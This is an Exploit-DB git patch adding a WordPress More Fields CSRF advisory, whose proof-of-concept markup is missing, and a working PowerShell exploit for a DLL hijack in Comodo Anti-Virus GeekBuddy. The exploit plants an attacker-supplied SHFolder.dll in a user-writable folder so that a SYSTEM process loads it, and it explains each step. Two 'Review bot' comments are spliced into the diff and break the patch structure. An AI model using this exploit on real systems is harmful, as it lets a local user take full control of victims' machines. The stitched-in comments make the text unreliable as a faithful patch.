From a4526e0949a8604aa1c2277f2ecb9fb2dbeb5954 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 1 Mar 2016 05:02:23 +0000
Subject: [PATCH] DB: 2016-03-01 2 new exploits
---
 files.csv | 2 +
 platforms/php/webapps/39507.txt | 65 ++++++++
 platforms/windows/local/39508.ps1 | 261 ++++++++++++++++++++++++++++++
 3 files changed, 328 insertions(+)
 create mode 100755 platforms/php/webapps/39507.txt
 create mode 100755 platforms/windows/local/39508.ps1
diff --git a/files.csv b/files.csv
index 9cfafac72..8bee23f73 100755
--- a/files.csv
+++ b/files.csv
@@ -35745,3 +35745,5 @@ id,file,description,date,author,platform,type,port
 39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0
 39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0
 39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80
+39507,platforms/php/webapps/39507.txt,"WordPress More Fields <= 2.1 Plugin - CSRF Vulnerability",2016-02-29,"Aatif Shahdad",php,webapps,80
+39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus SHFolder.DLL - Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
diff --git a/platforms/php/webapps/39507.txt b/platforms/php/webapps/39507.txt
new file mode 100755
index 000000000..71ffac2fc
--- /dev/null
+++ b/platforms/php/webapps/39507.txt
@@ -0,0 +1,65 @@
+# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery
+# Date: 28-02-2016
+# Software Link: https://wordpress.org/support/plugin/more-fields
+# Exploit Author: Aatif Shahdad
+# Twitter: https://twitter.com/61617469665f736
+# Contact: aatif_shahdad@icloud.com
+# Category: webapps
+
+1. Description
+
+The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause
+a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
+
+2. Proof of Concept
+
+Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in.
+
+POC to add box named ‘test’:
+
+--POC begins--
+Add Boxes:
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Remove Boxes needs the following simple GET request (Assuming the name of the Box we want to delete is ‘test’):
+
+
+
+
+
+
+
+
+
+
+
+
+
+Note: I have removed the CSRF tokens from the requests as they are redundant and not validated.
+
+--End of POC--
+
+
+3. Impact
+
+The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
+
+4. Solution:
+
+Add in CSRF token validation to the plugin or switch to a different plugin. The development of the Plugin has ceased so this happens to be the latest version which can’t be upgraded as of now.
\ No newline at end of file
diff --git a/platforms/windows/local/39508.ps1 b/platforms/windows/local/39508.ps1
new file mode 100755
index 000000000..e77d8c8ea
--- /dev/null
+++ b/platforms/windows/local/39508.ps1
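Review bot: Section 4 ("Solution") tells the reader to "add in CSRF token validation" but names no concrete control, and section 2 describes box removal as a plain GET request, which the solution does not address at all. For a site owner who has to keep the plugin, the text would be more useful with something like `Emit a nonce with wp_nonce_field() in each admin form and verify it with check_admin_referer() (or wp_verify_nonce()) before any box is saved or deleted; perform deletion via POST, not GET.` Since the advisory says development has ceased, it is also worth stating that deactivating the plugin is the only vendor-independent mitigation. The proof-of-concept markup between "--POC begins--" and "--End of POC--" did not survive on this page (only empty added lines remain), so the request parameters cannot be checked from what is shown here.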
@@ -0,0 +1,261 @@ +<# + + + ````......```` + ``,;''''''''''''''''';,` + .;''''''''''''''''''''''''''',` + `:''''''''+';:,.``````.,:;'''''''''':` + ,;'''''';,.` ``,;'''''';: + `:'''''',. `,'''''';. + `;+''+':` ,; `,''''';. + `;'''';. `` .:;'` `. `;'''''. + ` :+''';` `,``:+'' ';;'`,''; `` `` :'''';` + .'''';` ,';' '':'` ';,'`'',' :''' .''` :'''', + `;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''` + .''''. ;:`, .'.':`'''.:;`;. +;:' '::; ;''' '; .'''', + :''';` ` '''',`':'' ..;:`','` '''' ':;;`'`';`':` :; :'''; + ;''+, .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';': .+'''` + `''''` ;'; ''.'.,','` ,` ``;`'' .`;'`''+: ;'''` + `'''' ., .'' ,'.'' ;;. ```````` `. ``'::'`;; ` :'''. + ``''': `+,` .':`'',' `,;''''''''''+'':.` ;'.+:;'``': .'''. + `''', '', ''`:; `:'''''''''''''''''''''';. `;'`': ''`'` .''', + `''', ` `''` `'; .''''''''''''''''''''''''''''';` `.;' ;'.''`.: `''', + `''', :''.`'' ` ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''` .'''. + ''', '.''`,': ,'''''''''''''''''''''''''''''''''''''', ` .+,'; ''; .'''` + ''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''. ;' :': ,,` .''' + :''; `''.'` ` :''''''''''''';:::.', `''';`:;'+'''','''''+; `,'; :''' ,''' + .''' `` .++; `''''''''''''`. `': '''; `:''' :'''''''. .+ :''.+. :'': + `''+ :'': `` ,''''''''''''' `': '''; `: ,'''''''': .`''.'' ` '''` + ;''. `+.',; ;'''':''''''''; ` ', .'''': ` :''''';'''; `'.',`,', `+'' + ,'': '';,'. ;''''':''''''''`+` ;..`;'+''. '.:''''';'''''```.+' +:'` .''; + `''' `;``+',;.` ;''''':''''''''.'; `;'', '` '' ;''''','''''` ;,+.+. ;''. + ;'+. :'': ;': ;'''''':''''':',''. `'';.+' '` ,'; .'''';''''''` `+.':` `''' + `'': .+`;''` ` ;'''''':''''''.::''. .''. :: `'';`,'''':''''''` :+'. ,'', + '''` :''.:'' :''''''':'''''; :'''' .'', `.,; :+'`''': ;''',''''''' ,` ''' + .'': `'';`` ,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+` .'': + ''' `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''', ` ;'': ''' + .'', ','';`. '''''''; :'''''' `,;'''''''''.``` . 
''''';:,`:;''+`'''',,'''''''` :'';` `+': + '''` ''.,'; ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;'' + `'': .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', ., `` .'', + ` :'' :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''` .++. ''; + +'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.''''''; .+'''` :'+` + ,''. ': +'''''; ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.', ;''''''` :'': `. `''; + ;'' :;.;': ,''''''. `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.; .;'+` ;'' + '': ` ;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;. ,'''''' `;''''. .''` + .''. .';`;' .''''''. :+;;''''''''''': ;' ::::...;''+'':,'''';..``;''';. ''''''; `:''.`': `'': + :'' ` ,'` ;''''''. :;'''''''''''''';`;, `,''';` .:;;;'''': ,'''''' .,''', ''' + ;'; ''';,` `''''''''''` :''''''''''';.:'''`';:` ,''';`;''''''''''', ''''''. ;';,` :''` + `'', .;,'''; ,'''''''''' ;'''''''''':` :'''`::` ``'''',+''''''''''''+` ;'''''; .``.:;` `''. + .''` `+;'`;` '''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''` ;'';;; `+': + :'' ..;'' `''''''''''`'''''''', .'''` `+''';''. ,'''''''''''''''''''''''''''''''''''''':` + ;'' :. `` .'''''''''';'''''''' ;''; ;''':::` :'''''''''''''''''''''''''''''''''''''''', + ;': '''':` :'''''''''''''''''',` .''' ''''. `+''''''''''''''''''''''''''''''''''''''''' + '', :,;'': ;''''''''''''''''''` ;''... :''''` :''''''''''''''''''''''''''''''''''''''''''` + `''. `+'':,` ''''''''''''''''''; ,'';.+` . ,;''' `''''''''''''''''''''''''''''''''''''''''''; + .''. `.,;'; '''''''''';''''''', ''',+. `` .' .''' ''''''''+'''''''''''''''''''''''''''''''''', + .'+` ;''''' `` '''''''` `;''''.'++','`+.''' ''''''; `;+'''''' + ,'' ''''';; ,'''';'''';'``.''' :''''''` .'''''': + :'+ '''''': .'''';'''';'` .''' ,''''''` ,'''''; + :'' ,''''', ''''''` .'''';'''';', .'''` .''''''` '''''' + ;'' `''''''; :''''', '''''' .'''';'''';':,''''. 
.''''''` '''''' + ;'' `';''''' :''''', :''''; :''''''''';''.''''' `''''''` ;''''' + ;'' :''''', ,''''' `+''''''''':''.'''''` ,'''''; '''''' + :'+ ,''''', `'''''. ,'''''''''':''::''''; ;''''': `'''''' + :'' ```. ,''''': ''''': `''''''''''',''+`'''''. `''''''. :'''''' + ,''` `''''''' .'''''; `''''': '''''''''''';''',,''''', ''''''' ,'''''', + .''` `''':,.; `'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .'''''''' + `''` `,;;;''` '''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''', + '', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+ ''''''''''''''''''''''''''''''; + '': ` `,. ;'''''. `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';'; + ;'; ,''''; :''''': `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,''''''''''''''''''''''''''''; + ;'' ';;,.. .'''''' `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';. + :'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+: '''''''';''''''''';''''';,` + .''. .''',` ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''` `'''''' `,'': `+': + '': ` .;. ,'''''+ .'';,'''''''';:''''''''','''''''': ;'''''''''.`,''''''' ;'''''; ,'', .''. + ''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''', ''''''. ':''', :''` + :'' ,';:.'. ;'''''' ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'': :'''''' ';,.:' ''' + .''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'': + ''; ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;: ,''` + ;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.''''''; ,'+'. ''' + .''. '''';` ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:''' `'': + ''' :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..' :'' + :''` `,. 
;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''` ''; + `'': `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,' ,'', + ;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+; ''' + `'': ;'';` ` ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:'; .'': + ''+` ,` ,+: `'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;, ''' + .'': ;';''. .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''': +'``;'; .'', + ''+` :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';''''''; ,.''. .`` ''' + `';; `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''. + :'',` `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''` `''' + ''' ;'.:''` ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',: '''` + .';; `;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';'''''; .,''` :` ,'': + ;'', `', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,''''; ``.'''; ``''' + '''` `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''` '''` + .''' ;'.'' `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'', + ,''; ''.;', ,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:''; + ;''; ''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''','' + ''': .,,': :': +''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',` + ''': ` .'' `'`;'''''''..,.:+,` ``.,.` ,'''`;'''''''+.';'.:'''':;'''''+:.'` + ''': ;:`+'` ,:..,''''''; .+: `:'+''''';` ;'; .''''': `:';:+''';`''''''. .': + `'''; ; ;'. .';'`;'''',;'. .+''''''''''` ;;'+:'''; .+'''''''';''''''.;,''; + `'''' ,'; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.'''; + `'''' ` ` `':. ';''.+. `''''''''''''; `'''''::'''.'''',`'''''': :';;'' + ''''. :;,'`:'.';', '''''''''''': ,'''','''..''': '''';;:,''. 
`'' + :''': `.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' '; + ,''''` `,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`': + `'''': ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','. + :''''. .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'. + `'''''` `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''','' + ,'''''` `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.: + :''''', .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '. + `:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+ + `,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,: + .;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' + + .:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``: + '. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`' + ;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`; + .+ ''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;` + +: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;.., + ,' ``.. `+''''''''''+` :' `'';`''':. ,.',''.; ' + `+' :'''''''''''', `+.` '',.''',. :,''''+ ; + .', ;''''''''''''. ': ''.,''':` ;.''''.,. + :'. :''''''''''', ;'` ''.:''',':;.''':.: + ''. ,:''''',` ;+` :'.:'''' ':`''; ; + `'', ''. ::,''''``; :, ' + ;+;` .'+` ``'':'`,; '`` + ,'';. `.'';` :';'.,; '. + `,''';:::::;'''. ``+;' +` + `,:''''';,` ,,; + + + +SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares) + +Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC: + +###Technical Geeky Stuff### + +GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder. +These binaries are individual components of the Comodo Security Suite and are executed whenever +their related function is performed, updated, or uninstalled. + +The directory listing is as follows: +10/06/2015 12:08 AM . +10/06/2015 12:08 AM .. 
+10/02/2015 10:43 PM 27 download.cfg
+10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
+10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
+10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
+10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
+10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
+10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
+10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
+10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
+10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
+10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
+10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
+10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
+10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
+10/02/2015 10:43 PM 1 survey_version.txt
+10/06/2015 12:05 AM updates
+
+The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
+
+C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
+ BUILTIN\Administrators:(OI)(CI)(ID)F
+ CREATOR OWNER:(OI)(CI)(IO)(ID)F
+ BUILTIN\Users:(OI)(CI)(ID)R
+ BUILTIN\Users:(CI)(ID)(special access:)
+ FILE_WRITE_DATA
+ FILE_APPEND_DATA
+ FILE_WRITE_EA
+ FILE_WRITE_ATTRIBUTES
+
+Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows
+non-administrator users the ability to create files in the directory but not delete or modify
+existing files.
+
+Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
+in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
+registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
+
+This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
+level privielges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
+to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
+
+During client connections to update servers and Geek Buddy executions the unit.exe binary will
+launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has
+hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
+executed from.
+
+.data:00409240 dd offset aShfolder ; "SHFOLDER"
+.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
+
+During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
+looking in the other PATHS variables.
+
+By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
+update or client connection to secure servers (which occurs automatically at user login) a user can
+elevate their privileges to SYSTEM and compromise the system fully.
+
+
+######### GREETZ ######################################################################################
+1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
+
+@taviso - keep killing it and thanks for being an inspiration
+@bill_billbil - sup girl chicken rico n chill
+@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
+@hellNBak_ - drop tehm greetz like its 2003
+@hacksforpancakes - make plans for other NullCon in 2016 ;)
+@jduck - we gonna juke some more toyotas next time you come visit
+@hdmoore - good luck with your ventures good sir
+@jsoo - dont give up good sir - you're doing awesome
+@thegrugq - when i grow up i hope im half as wise as you good sir
+@daveaitel - Triangular Anus logos are the best
+@da_667 - AYYYYYYYYYYYYYY LMAO
+@bonovoxly - Clever Girls Wear Pink on Wednesdays
+Derek Soeder - Respect to you brother, keep on being awesome
+Benny 29A - next time im in CZ lets get beers, im buying
+Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
+Sizzop - for fixing my greetz
+
+#########################################################################################################
+
+
+#>
+
+Param
+(
+
+ [Parameter(ValueFromPipelineByPropertyName = $true)]
+ [string]$DLL = ""
+)
+
+
+
+
+if (!(Test-Path $DLL))
+{
+ throw "Fatal Error: The specified file: $DLL does not exist."
+}
+
+Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
+
+Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
+
+
+[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
+
+$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
+
+
+$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
+$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
+$objNotifyIcon.BalloonTipIcon = "Info"
+$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
+Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
+$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
+
+$objNotifyIcon.Visible = $True
+$objNotifyIcon.ShowBalloonTip(8000)
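Review bot: The header comment block explains the root cause well (BUILTIN\Users holding FILE_WRITE_DATA on C:\ProgramData\Comodo\lps4\temp, plus a SYSTEM-launched setup binary that resolves SHFOLDER.DLL from its own directory) but gives a defender nothing to act on: no affected or fixed product version is stated, even though the text says the issue took 146 days to fix. I would add two lines to the comment block, e.g. `Fixed in: <vendor fixed version - not stated in this file>` and `Check: SHFolder.dll is not among the files listed above for lps4\temp; its presence there, or any non-admin write access on that folder, should be investigated.` It would also help to say that the underlying defects are the inherited Users write ACE and the application-directory DLL lookup, so that removing the ACE (if the product tolerates it - unverified here) is the interim hardening step until the fixed build is installed.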